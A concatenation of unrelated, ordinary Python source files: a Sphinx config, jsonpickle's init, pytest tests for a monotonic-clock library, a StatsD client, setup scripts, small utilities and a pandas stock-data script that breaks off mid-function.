    'sphinx.ext.napoleon',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'RedPipe'
copyright = u'2017, John Loehrer'
author = u'John Loehrer'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = redpipe.__version__

# The full version, including alpha/beta/rc tags.
release = redpipe.__version__

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False


# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
    'logo': 'redpipe-logo.gif',
    'github_banner': True,
    'github_user': '72squared',
    'github_repo': 'redpipe',
    'travis_button': True,
    'analytics_id': 'UA-98626018-1',
}

html_sidebars = {
    '**': [
        'about.html',
        'navigation.html',
        'relations.html',
        'searchbox.html',
    ]
}


# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']


# -- Options for HTMLHelp output ------------------------------------------

# Output file base name for HTML help builder.
htmlhelp_basename = 'RedPipedoc'


# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',

    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'RedPipe.tex', u'%s Documentation' % project,
     u'John Loehrer', 'manual'),
]


# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, project, u'%s Documentation' % project,
     [author], 1)
]


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, project, u'%s Documentation' % project,
     author, project, 'making redis pipelines easy in python',
     'Miscellaneous'),
]

suppress_warnings = ['image.nonlocal_uri']

from src.tools.dictionaries import PostLoadedDict

# Utility class
################################################
class ServerImplementationDict(PostLoadedDict):
    def __missing__(self, key):
        try:
            return super().__missing__(key)
        except KeyError:
            return NotImplemented
################################################



class Server():
    def __init__(self, shortname, loader):
        # Not preloaded
        # loaders must produce dictionaries (or an appropriate iterable)
        # with the required keys.
        # The reason for this is that code for certain servers need not be loaded
        # if it's not going to be used at all
        # It also prevents import loop collisions.
        global __ServerImplementationDict
        self.__data = ServerImplementationDict(loader)
        self.__shortname = shortname
    
    @property
    def shortname(self):
    # This is the only property provided from above
        return self.__shortname
        
    def __str__(self):
        return str(self.__shortname)
        
    # All other properties must come from canonical sources
    # provided by the server loader
    
    # CONSTANTS (STRINGS, BOOLEANS, INTS, ETC.)
    
    @property
    def name(self):
        return self.__data['str_name']
        
    @property
    def internal_shortname(self):
        return self.__data['str_shortname']
        
    @property
    def beta(self):
        return self.__data['bool_tester']
    
    
    # CLASSES
    
    # 1- Credentials:
    
    @property
    def Auth(self): # I really don't know how to call this.
        return self.__data['cls_auth']
    @property
    def auth_fields(self):
        return self.__data['list_authkeys']
        
    # 2- Server Elements:
    
    @property
    def Player(self):
        return self.__data['cls_player']
    
    @property
    def Tournament(self):
        return self.__data['cls_tournament']
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008 John Paulett (john -at- paulett.org)
# Copyright (C) 2009, 2011, 2013 David Aguilar (davvid -at- gmail.com)
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.

"""Python library for serializing any arbitrary object graph into JSON.

jsonpickle can take almost any Python object and turn the object into JSON.
Additionally, it can reconstitute the object back into Python.

The object must be accessible globally via a module and must
inherit from object (AKA new-style classes).

Create an object::

    class Thing(object):
        def __init__(self, name):
            self.name = name

    obj = Thing('Awesome')

Use jsonpickle to transform the object into a JSON string::

    import jsonpickle
    frozen = jsonpickle.encode(obj)

Use jsonpickle to recreate a Python object from a JSON string::

    thawed = jsonpickle.decode(frozen)

.. warning::

    Loading a JSON string from an untrusted source represents a potential
    security vulnerability.  jsonpickle makes no attempt to sanitize the input.

The new object has the same type and data, but essentially is now a copy of
the original.

.. code-block:: python

    assert obj.name == thawed.name

If you will never need to load (regenerate the Python class from JSON), you can
pass in the keyword unpicklable=False to prevent extra information from being
added to JSON::

    oneway = jsonpickle.encode(obj, unpicklable=False)
    result = jsonpickle.decode(oneway)
    assert obj.name == result['name'] == 'Awesome'

"""
import sys, os
from music21 import common
sys.path.append(common.getSourceFilePath() + os.path.sep + 'ext')


from jsonpickle import pickler
from jsonpickle import unpickler
from jsonpickle.backend import JSONBackend
from jsonpickle.version import VERSION

# ensure built-in handlers are loaded
__import__('jsonpickle.handlers')

__all__ = ('encode', 'decode')
__version__ = VERSION

json = JSONBackend()

# Export specific JSONPluginMgr methods into the jsonpickle namespace
set_preferred_backend = json.set_preferred_backend
set_encoder_options = json.set_encoder_options
load_backend = json.load_backend
remove_backend = json.remove_backend
enable_fallthrough = json.enable_fallthrough


def encode(value,
           unpicklable=True,
           make_refs=True,
           keys=False,
           max_depth=None,
           backend=None,
           warn=False,
           max_iter=None):
    """Return a JSON formatted representation of value, a Python object.

    :param unpicklable: If set to False then the output will not contain the
        information necessary to turn the JSON data back into Python objects,
        but a simpler JSON stream is produced.
    :param max_depth: If set to a non-negative integer then jsonpickle will
        not recurse deeper than 'max_depth' steps into the object.  Anything
        deeper than 'max_depth' is represented using a Python repr() of the
        object.
    :param make_refs: If set to False jsonpickle's referencing support is
        disabled.  Objects that are id()-identical won't be preserved across
        encode()/decode(), but the resulting JSON stream will be conceptually
        simpler.  jsonpickle detects cyclical objects and will break the cycle
        by calling repr() instead of recursing when make_refs is set False.
    :param keys: If set to True then jsonpickle will encode non-string
        dictionary keys instead of coercing them into strings via `repr()`.
    :param warn: If set to True then jsonpickle will warn when it
        returns None for an object which it cannot pickle
        (e.g. file descriptors).
    :param max_iter: If set to a non-negative integer then jsonpickle will
        consume at most `max_iter` items when pickling iterators.

    >>> encode('my string')
    '"my string"'
    >>> encode(36)
    '36'

    >>> encode({'foo': True})
    '{"foo": true}'

    >>> encode({'foo': True}, max_depth=0)
    '"{\\'foo\\': True}"'

    >>> encode({'foo': True}, max_depth=1)
    '{"foo": "True"}'


    """
    if backend is None:
        backend = json
    return pickler.encode(value,
                          backend=backend,
                          unpicklable=unpicklable,
                          make_refs=make_refs,
                          keys=keys,
                          max_depth=max_depth,
                          warn=warn)


def decode(string, backend=None, keys=False):
    """Convert a JSON string into a Python object.

    The keyword argument 'keys' defaults to False.
    If set to True then jsonpickle will decode non-string dictionary keys
    into python objects via the jsonpickle protocol.

    >>> str(decode('"my string"'))
    'my string'
    >>> decode('36')
    36
    """
    if backend is None:
        backend = json
    return unpickler.decode(string, backend=backend, keys=keys)


# json.load(),loads(), dump(), dumps() compatibility
dumps = encode
loads = decode

# -*- coding: utf-8 -*-
"""
Created on Wed Sep 09 13:04:53 2015

* If TimerTool.exe is running, kill the process.
* If input parameter is given, start TimerTool and set clock resolution
Starts TimerTool.exe and sets the clock resolution to argv[0] ms

Ex: python set_clock_resolution 0.5
@author: marcus
"""

import time, datetime
from socket import gethostname, gethostbyname
import os
import numpy as np

def main():
    
    my_path = os.path.join('C:',os.sep,'Share','sync_clocks')
    os.chdir(my_path)
    
    # Initial timestamps
    t1 = time.clock()
    t2 = time.time()
    t3 = datetime.datetime.now()
    
    td1 = []
    td2 = []
    td3 = []
    for i in xrange(100):
        td1.append(time.clock()-t1)
        td2.append(time.time() -t2)    
        td3.append((datetime.datetime.now()-t3).total_seconds())        
        time.sleep(0.001)
        
    # Create text file and write header
    t = datetime.datetime.now()
    ip = gethostbyname(gethostname()).split('.')[-1]
    f_name = '_'.join([ip,'test_clock_res',str(t.year),str(t.month),str(t.day),
                       str(t.hour),str(t.minute),str(t.second)])
    f = open(f_name+'.txt','w')
    f.write('%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n'    %
            ('mean_clock','median_clock','sd_clock',
             'mean_time','median_time','sd_time',
             'mean_datetime','median_datetime','sd_datetime',))     
        
    # Write results to text file
    f.write('%.2f\t%.2f\t%.2f\t%.2f\t%.2f\t%.2f\t%.2f\t%.2f\t%.2f\n' % 
            (np.mean(np.diff(td1))*1000, np.median(np.diff(td1))*1000,np.std(np.diff(td1))*1000,
             np.mean(np.diff(td2))*1000, np.median(np.diff(td2))*1000,np.std(np.diff(td2))*1000,
             np.mean(np.diff(td3))*1000, np.median(np.diff(td3))*1000,np.std(np.diff(td3))*1000))
             
    f.close()

if __name__ == "__main__":
    main()    
blocklevel = ["blockquote", "div", "form", "p", "table", "video", "h1", "h2", "h3", "h4", "h5", "h6", "hr", "details", "article", "header", "main"]
def normalizeEnter(src):
	#Deletes all user defined for readability reason existing line breaks that are issues for the HTML output
	for elem in blocklevel:
		while src.find("\r<" + elem) > -1:
			src = src.replace("\r<" + elem, "<" + elem)
		while src.find("</" + elem + ">\r") > -1:
			src = src.replace("</" + elem + ">\r", "</" + elem + ">")
		while src.find(">\r") > -1:
			src = src.replace(">\r", ">") #It is really needed, it created some other bugs?!
		while src.find("\r</") > -1:
			src = src.replace("\r</", "</") ##It is really needed, it created some other bugs?!
	return src
def main(islinput, inputfile, pluginData, globalData):
	currentIndex = 0
	for item in islinput:
		item = normalizeEnter(item) #Deletes not wanted line breaks in order to prevent the problem we have with Markdown.
		islinput[currentIndex] = item
		currentIndex += 1
	return islinput, pluginData, globalData

import cairo

from gi.repository import Gtk
from gi.repository import Gdk

from pylsner import plugin


class Window(Gtk.Window):

    def __init__(self):
        super(Window, self).__init__(skip_pager_hint=True,
                                     skip_taskbar_hint=True,
                                    )
        self.set_title('Pylsner')

        screen = self.get_screen()
        self.width = screen.get_width()
        self.height = screen.get_height()
        self.set_size_request(self.width, self.height)
        self.set_position(Gtk.WindowPosition.CENTER)
        rgba = screen.get_rgba_visual()
        self.set_visual(rgba)
        self.override_background_color(Gtk.StateFlags.NORMAL,
                                       Gdk.RGBA(0, 0, 0, 0),
                                      )

        self.set_wmclass('pylsner', 'pylsner')
        self.set_type_hint(Gdk.WindowTypeHint.DOCK)
        self.stick()
        self.set_keep_below(True)

        drawing_area = Gtk.DrawingArea()
        drawing_area.connect('draw', self.redraw)
        self.refresh_cnt = 0
        self.add(drawing_area)

        self.connect('destroy', lambda q: Gtk.main_quit())

        self.widgets = []

        self.show_all()

    def refresh(self, force=False):
        self.refresh_cnt += 1
        if self.refresh_cnt >= 60000:
            self.refresh_cnt = 0
        redraw_required = False
        for wid in self.widgets:
            if (self.refresh_cnt % wid.metric.refresh_rate == 0) or force:
                wid.refresh()
                redraw_required = True
        if redraw_required:
            self.queue_draw()
        return True

    def redraw(self, _, ctx):
        ctx.set_antialias(cairo.ANTIALIAS_SUBPIXEL)
        for wid in self.widgets:
            wid.redraw(ctx)


class Widget:

    def __init__(self,
                 name='default',
                 metric={'plugin': 'time'},
                 indicator={'plugin': 'arc'},
                 fill={'plugin': 'rgba_255'},
                ):
        self.name = name
        MetricPlugin = plugin.load_plugin('metrics', metric['plugin'])
        self.metric = MetricPlugin(**metric)
        IndicatorPlugin = plugin.load_plugin('indicators', indicator['plugin'])
        self.indicator = IndicatorPlugin(**indicator)
        FillPlugin = plugin.load_plugin('fills', fill['plugin'])
        self.fill = FillPlugin(**fill)

    def refresh(self):
        self.metric.refresh()
        self.fill.refresh(self.metric.value)

    def redraw(self, ctx):
        ctx.set_source(self.fill.pattern)
        self.indicator.redraw(ctx, self.metric.value)

# Given the list values = [] , write code that fills the list with each set of numbers below.
# a.1     2   3   4   5   6   7   8   9   10


list = []

for i in range(11):
    list.append(i)

print(list)
"""
Tests for L{monotone}.
"""
from hypothesis import given, strategies as st
import errno

from monotone import get_clock_info, monotonic
from monotone import _api, _bindings

import os

import platform

import pytest

needs_posix = pytest.mark.skipif(
    os.name == "posix" and platform.system() == "Darwin",
    reason="POSIX-only tests (clock_gettime(3))",
)
needs_macos = pytest.mark.skipif(
    platform.system() != "Darwin",
    reason="macOS-only tests (mach_absolute_time(3))",
)


@pytest.fixture
def errno_value():
    """
    A particular errno.
    """
    return errno.EINVAL


@pytest.fixture
def strerror(errno_value):
    """
    The string representation of a particular errno
    """
    return "[Errno {}] Invalid argument".format(errno_value)


@pytest.fixture
def apply_failing_clock_call(monkeypatch):
    """
    Return a callable that patches in a failing system call fake that
    fails and return a list of calls to that fake.
    """

    def _apply_failing_clock_call(name, errno_value):
        calls = []

        def _failing_clock_call(clock_id, timespec):
            calls.append((clock_id, timespec))
            monkeypatch.setattr(_api.ffi, "errno", errno.EINVAL)
            return -1

        monkeypatch.setattr(_api, name, _failing_clock_call)

        return calls

    return _apply_failing_clock_call


@pytest.fixture
def apply_timespec(monkeypatch):
    """
    Return a callable that patches in a fake over the specified clock
    call that sets the specified resolution and returns a list of
    calls to that fake.
    """

    def _apply_timespec(name, goal_timespec):
        calls = []

        def _fake_clock_call(clock_id, timespec):
            calls.append((clock_id, timespec))
            timespec[0] = goal_timespec[0]
            return 0

        monkeypatch.setattr(_api, name, _fake_clock_call)

        return calls

    return _apply_timespec


class TestSimpleNamespace(object):
    """
    Tests for L{_SimpleNamespace}.
    """

    def test_init(self):
        """
        The initializer updates the instance's C{__dict__} with its
        keyword arguments.
        """
        namespace = _api._SimpleNamespace(x=1)
        assert namespace.x == 1

    def test_repr(self):
        """
        The instance's repr reflects its C{__dict__}
        """
        namespace = _api._SimpleNamespace()
        namespace.y = 2
        assert repr(namespace) == "namespace(y=2)"

    def test_eq(self):
        """
        Two instances with equal C{__dict__}s are equal.
        """
        assert _api._SimpleNamespace(a=1) == _api._SimpleNamespace(a=1)


@needs_posix
class TestGetClockInfoPosix(object):

    """
    Tests for L{get_clock_info}.
    """

    def test_non_monotonic(self):
        """
        L{get_clock_info} only knows about the monotonic clock.
        """
        with pytest.raises(ValueError):
            get_clock_info("not monotonic")

    def test_failure(self, apply_failing_clock_call, errno_value, strerror):
        """
        A failure in C{clock_getres} results in an L{OSError} that
        presents the failure's errno.
        """
        calls = apply_failing_clock_call('_clock_getres', errno_value)

        with pytest.raises(OSError) as exc:
            get_clock_info("monotonic")

        assert len(calls) == 1
        assert calls[0][0] == _bindings.lib.CLOCK_MONOTONIC

        assert str(exc.value) == strerror

    @given(
        clock_getres_spec=st.fixed_dictionaries({
            "tv_sec": st.sampled_from([0, 1]),
            "tv_nsec": st.sampled_from([0, 1]),

        }),
    )
    def test_info(self, clock_getres_spec, apply_timespec):
        """
        The reported info always includes a nanosecond resolution when
        C{clock_getres} indicates nanosecond resolution.
        """
        calls = apply_timespec(
            "_clock_getres",
            _bindings.ffi.new("struct timespec *", clock_getres_spec),
        )

        expected_info = _api._SimpleNamespace(
            adjustable=False,
            implementation="clock_gettime(MONOTONIC)",
            monotonic=True,
            resolution=None,    # checked separately
        )

        if clock_getres_spec['tv_nsec']:
            expected_resolution = 1e-09
        else:
            expected_resolution = 1.0

        info = get_clock_info("monotonic")
        resolution, info.resolution = info.resolution, None

        assert info == expected_info
        assert resolution - expected_resolution == pytest.approx(0.0)

        assert len(calls) == 1
        assert calls[0][0] == _bindings.lib.CLOCK_MONOTONIC


@needs_macos
class TestGetClockInfoMacOS(object):
    """
    Tests for L{get_clock_info}.
    """

    def test_non_monotonic(self):
        """
        L{get_clock_info} only knows about the monotonic clock.
        """
        with pytest.raises(ValueError):
            get_clock_info("not monotonic")

    def test_info(self):
        """
        The reported info always includes a nanosecond resolution.
        """

        expected_info = _api._SimpleNamespace(
            adjustable=False,
            implementation="mach_absolute_time()",
            monotonic=True,
            resolution=None,    # checked separately
        )

        expected_resolution = 1e-09

        info = get_clock_info("monotonic")
        resolution, info.resolution = info.resolution, None

        assert info == expected_info
        assert resolution - expected_resolution == pytest.approx(0.0)


@needs_posix
def test_monotonic_fails_posix(apply_failing_clock_call,
                               errno_value,
                               strerror):
    """
    A failure in C{clock_gettime} results in an L{OSError} that
    presents the failure's errno.
    """
    calls = apply_failing_clock_call('_clock_gettime', errno_value)

    with pytest.raises(OSError) as exc:
        monotonic()

    assert len(calls) == 1
    assert calls[0][0] == _bindings.lib.CLOCK_MONOTONIC

    assert str(exc.value) == strerror


@needs_posix
@given(
    clock_gettime_spec=st.fixed_dictionaries({
        "tv_sec": st.integers(min_value=0, max_value=2 ** 32 - 1),
        "tv_nsec": st.integers(min_value=0, max_value=2 ** 32 - 1),

    }),
)
def test_clock(clock_gettime_spec, apply_timespec):
    """
    For any given time resolution, the monotonic time equals the
    sum of the seconds and nanoseconds.
    """
    clock_gettime_calls = apply_timespec(
        '_clock_gettime',
        _bindings.ffi.new("struct timespec *", clock_gettime_spec),
    )

    # we a float, representing the current seconds plus the
    # nanoseconds (offset by a billion) iff the resolution is accurate
    # to the nanosecond.
    expected = float(clock_gettime_spec['tv_sec']) + (
        clock_gettime_spec['tv_nsec'] * 1e-09)

    result = monotonic()

    assert result - expected == pytest.approx(0.0)

    assert clock_gettime_calls[0][0] == _bindings.lib.CLOCK_MONOTONIC


def test_clock_increases():
    """
    A monotonic moment is never greater than a succeeding monotonic
    moment.
    """
    assert monotonic() <= monotonic()

"""
http://community.topcoder.com/stat?c=problem_statement&pm=1667

Single Round Match 147 Round 1 - Division II, Level One
"""


class CCipher:
    def decode(self, cipherText, shift):
        a = ord('A')
        decoder = [a + (c - shift if c >= shift else c - shift + 26) for c in range(26)]
        plain = [chr(decoder[ord(c) - a]) for c in cipherText]
        return ''.join(plain)

from hwt.synthesizer.rtlLevel.extract_part_drivers import extract_part_drivers
from hwt.synthesizer.rtlLevel.remove_unconnected_signals import removeUnconnectedSignals
from hwt.synthesizer.rtlLevel.mark_visibility_of_signals_and_check_drivers import markVisibilityOfSignalsAndCheckDrivers


class DummyPlatform():
    """
    :note: all processors has to be callable with only one parameter
        which is actual Unit/RtlNetlist instance
    """

    def __init__(self):
        self.beforeToRtl = []
        self.beforeToRtlImpl = []
        self.afterToRtlImpl = []

        self.beforeHdlArchGeneration = [
            extract_part_drivers,
            removeUnconnectedSignals,
            markVisibilityOfSignalsAndCheckDrivers,
        ]
        self.afterToRtl = []

from __future__ import (absolute_import, division, print_function,
                        unicode_literals)

RJUST = 12


def format_fans(fans):
    return format_line(prefix='fans'.rjust(RJUST), values=fans)


def format_rpms(rpms):
    return format_line(prefix='rpms'.rjust(RJUST), values=rpms)


def format_pwms(pwms):
    return format_line(prefix='pwms'.rjust(RJUST), values=pwms)


def format_tmps(tmps):
    return format_line(prefix='temps'.rjust(RJUST), values=tmps)


def format_names(names):
    return format_line(prefix='names'.rjust(RJUST), values=names)


def format_ports(ports):
    return format_line(prefix='ports'.rjust(RJUST), values=ports)


def format_temps(temps):
    return format_line(prefix='temps'.rjust(RJUST), values=temps)


def format_ambients(ambients):
    return format_line(prefix='ambients'.rjust(RJUST), values=ambients)


def format_limits(limits):
    return format_line(prefix='limits'.rjust(RJUST), values=limits)


def format_buffers(buffers):
    return format_line(prefix='buffers'.rjust(RJUST), values=buffers)


def format_headrooms(headrooms):
    return format_line(prefix='headrooms'.rjust(RJUST), values=headrooms)


def format_directions(directions):
    return format_line(prefix='directions'.rjust(RJUST), values=directions)


def format_differences(differences):
    return format_line(prefix='differences'.rjust(RJUST), values=differences)


def format_pwms_new(pwms_new):
    return format_line(prefix='new pwms'.rjust(RJUST), values=pwms_new)


def format_line(prefix, values):
    line = ''
    line += prefix
    line += ': '
    line += '['
    for value in values:
        try:
            if value >= 1:
                value = int(round(value, 0))
            if 1 > value != 0:
                value = str(value)[1:4].ljust(3, '0')
        except TypeError:
            # value is None
            pass

        value = str(value) if value is not None else ''
        line += value.rjust(6)
        line += ', '
    line = line[:-len(', ')]
    line += ']'

    return line

# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding model 'Package'
        db.create_table(u'api_package', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500, db_index=True)),
            ('url', self.gf('django.db.models.fields.CharField')(unique=True, max_length=500)),
            ('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
        ))
        db.send_create_signal(u'api', ['Package'])

        # Adding unique constraint on 'Package', fields ['name', 'url']
        db.create_unique(u'api_package', ['name', 'url'])


    def backwards(self, orm):
        # Removing unique constraint on 'Package', fields ['name', 'url']
        db.delete_unique(u'api_package', ['name', 'url'])

        # Deleting model 'Package'
        db.delete_table(u'api_package')


    models = {
        u'api.package': {
            'Meta': {'unique_together': "(('name', 'url'),)", 'object_name': 'Package'},
            'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500', 'db_index': 'True'}),
            'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '500'})
        }
    }

    complete_apps = ['api']
from __future__ import absolute_import

import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
import matplotlib.pyplot as plt

from plotly.tests.utils import compare_dict
from plotly.tests.test_optional.optional_utils import run_fig
from plotly.tests.test_optional.test_matplotlylib.data.annotations import *


def test_annotations():
    fig, ax = plt.subplots()
    ax.plot([1, 2, 3], 'b-')
    ax.plot([3, 2, 1], 'b-')
    ax.text(0.001, 0.999,
            'top-left', transform=ax.transAxes, va='top', ha='left')
    ax.text(0.001, 0.001,
            'bottom-left', transform=ax.transAxes, va='baseline', ha='left')
    ax.text(0.999, 0.999,
            'top-right', transform=ax.transAxes, va='top', ha='right')
    ax.text(0.999, 0.001,
            'bottom-right', transform=ax.transAxes, va='baseline', ha='right')
    renderer = run_fig(fig)
    for data_no, data_dict in enumerate(renderer.plotly_fig['data']):
        equivalent, msg = compare_dict(data_dict,
                                       ANNOTATIONS['data'][data_no])
        assert equivalent, msg
    for no, note in enumerate(renderer.plotly_fig['layout']['annotations']):
        equivalent, msg = compare_dict(note,
                                       ANNOTATIONS['layout']['annotations'][no])
        assert equivalent, msg

from distutils.core import setup

setup(
    # Application name:
    name="streaker",

    # Version number (initial):
    version="0.0.1",

    # Application author details:
    author="Aldi Alimucaj",
    author_email="aldi.alimucaj@gmail.com",

    # Packages
    packages=["streaker"],

    scripts=['bin/streaker'],

    # Include additional files into the package
    include_package_data=True,

    # Details
    url="http://pypi.python.org/pypi/Streaker_v001/",

    #
    license="MIT",
    description="GitHub streak manipulator",

    # long_description=open("README.txt").read(),

    # Dependent packages (distributions)
    install_requires=[
        # "",
    ],
)

from __future__ import absolute_import, division, print_function, unicode_literals

# Statsd client. Loosely based on the version by Steve Ivy <steveivy@gmail.com>

import logging
import random
import socket
import time
from contextlib import contextmanager

log = logging.getLogger(__name__)


class StatsD(object):

    def __init__(self, host='localhost', port=8125, enabled=True, prefix=''):
        self.addr = None
        self.enabled = enabled
        if enabled:
            self.set_address(host, port)
        self.prefix = prefix
        self.udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def set_address(self, host, port=8125):
        try:
            self.addr = (socket.gethostbyname(host), port)
        except socket.gaierror:
            self.addr = None
            self.enabled = False

    @contextmanager
    def timed(self, stat, sample_rate=1):
        log.debug('Entering timed context for %r' % (stat,))
        start = time.time()
        yield
        duration = int((time.time() - start) * 1000)
        log.debug('Exiting timed context for %r' % (stat,))
        self.timing(stat, duration, sample_rate)

    def timing(self, stats, time, sample_rate=1):
        """
        Log timing information
        """
        unit = 'ms'
        log.debug('%r took %s %s' % (stats, time, unit))
        self.update_stats(stats, "%s|%s" % (time, unit), sample_rate)

    def increment(self, stats, sample_rate=1):
        """
        Increments one or more stats counters
        """
        self.update_stats(stats, 1, sample_rate)

    def decrement(self, stats, sample_rate=1):
        """
        Decrements one or more stats counters
        """
        self.update_stats(stats, -1, sample_rate)

    def update_stats(self, stats, delta=1, sampleRate=1):
        """
        Updates one or more stats counters by arbitrary amounts
        """
        if not self.enabled or self.addr is None:
            return

        if type(stats) is not list:
            stats = [stats]
        data = {}
        for stat in stats:
            data["%s%s" % (self.prefix, stat)] = "%s|c" % delta

        self.send(data, sampleRate)

    def send(self, data, sample_rate):
        sampled_data = {}

        if sample_rate < 1:
            if random.random() <= sample_rate:
                for stat, value in data.items():
                    sampled_data[stat] = "%s|@%s" % (value, sample_rate)
        else:
            sampled_data = data

        try:
            for stat, value in sampled_data.items():
                self.udp_sock.sendto("%s:%s" % (stat, value), self.addr)
        except Exception as e:
            log.exception('Failed to send data to the server: %r', e)


if __name__ == '__main__':
    sd = StatsD()
    for i in range(1, 100):
        sd.increment('test')

from setuptools import setup, find_packages
from codecs import open
from os import path

here = path.abspath(path.dirname(__file__))

# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()


setup(
    name='fcit',

    # Versions should comply with PEP440.  For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # https://packaging.python.org/en/latest/single_source_version.html
    version='1.2.0',

    description='A decision-tree based conditional independence test',
    long_description=long_description,

    # The project's main homepage.
    url = 'https://github.com/kjchalup/fcit',

    # Author details
    author = 'Krzysztof Chalupka',
    author_email = 'janchatko@gmail.com',

    # Choose your license
    license='MIT',

    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 3 - Alpha',

        # Indicate who your project is intended for
        'Intended Audience :: Science/Research',
        'Topic :: Scientific/Engineering :: Artificial Intelligence',


        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: MIT License',

        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],

    # What does your project relate to?
    keywords='machine learning statistics decision trees',

    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),

    # Alternatively, if you want to distribute just a my_module.py, uncomment
    # this:
    #   py_modules=["my_module"],

    # List run-time dependencies here.  These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    install_requires=['numpy', 'sklearn', 'scipy', 'joblib'],
)


import pandas as pd
import os
import time
from datetime import datetime
import re
from time import mktime
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import style
style.use("dark_background")

# path = "X:/Backups/intraQuarter" # for Windows with X files :)
# if git clone'ed then use relative path,
# assuming you extracted the downloaded zip into this project's folder:
path = "intraQuarter"

def Key_Stats(gather="Total Debt/Equity (mrq)"):
  statspath = path+'/_KeyStats'
  stock_list = [x[0] for x in os.walk(statspath)]
  df = pd.DataFrame(
    columns = [
      'Date',
      'Unix',
      'Ticker',
      'DE Ratio',
      'Price',
      'stock_p_change',
      'SP500',
      'sp500_p_change',
      'Difference',
      'Status'
    ]
  )

  sp500_df = pd.DataFrame.from_csv("YAHOO-INDEX_GSPC.csv")

  ticker_list = []

  for each_dir in stock_list[1:25]:
    each_file = os.listdir(each_dir)

    # ticker = each_dir.split("\\")[1] # Windows only
    # ticker = each_dir.split("/")[1] # this didn't work so do this:
    ticker = os.path.basename(os.path.normpath(each_dir))
    # print(ticker) # uncomment to verify
    ticker_list.append(ticker)

    starting_stock_value = False
    starting_sp500_value = False
    
    if len(each_file) > 0:
      for file in each_file:
        date_stamp = datetime.strptime(file, '%Y%m%d%H%M%S.html')
        unix_time = time.mktime(date_stamp.timetuple())
        full_file_path = each_dir + '/' + file
        source = open(full_file_path,'r').read()
        try:
          try:
            value = float(source.split(gather+':</td><td class="yfnc_tabledata1">')[1].split('</td>')[0])
          except:
            value = float(source.split(gather+':</td>\n<td class="yfnc_tabledata1">')[1].split('</td>')[0])
              
          try:
            sp500_date = datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')
            row = sp500_df[(sp500_df.index == sp500_date)]
            sp500_value = float(row['Adjusted Close'])
          except:
            sp500_date = datetime.fromtimestamp(unix_time-259200).strftime('%Y-%m-%d')
            row = sp500_df[(sp500_df.index == sp500_date)]
            sp500_value = float(row['Adjusted Close'])

          try:
            stock_price = float(source.split('</small><big><b>')[1].split('</b></big>')[0])
          except:
            try:
              stock_price = (source.split('</small><big><b>')[1].split('</b></big>')[0])
              #print(stock_price)
              stock_price = re.search(r'(\d{1,8}\.\d{1,8})', stock_price)
              stock_price = float(stock_price.group(1))
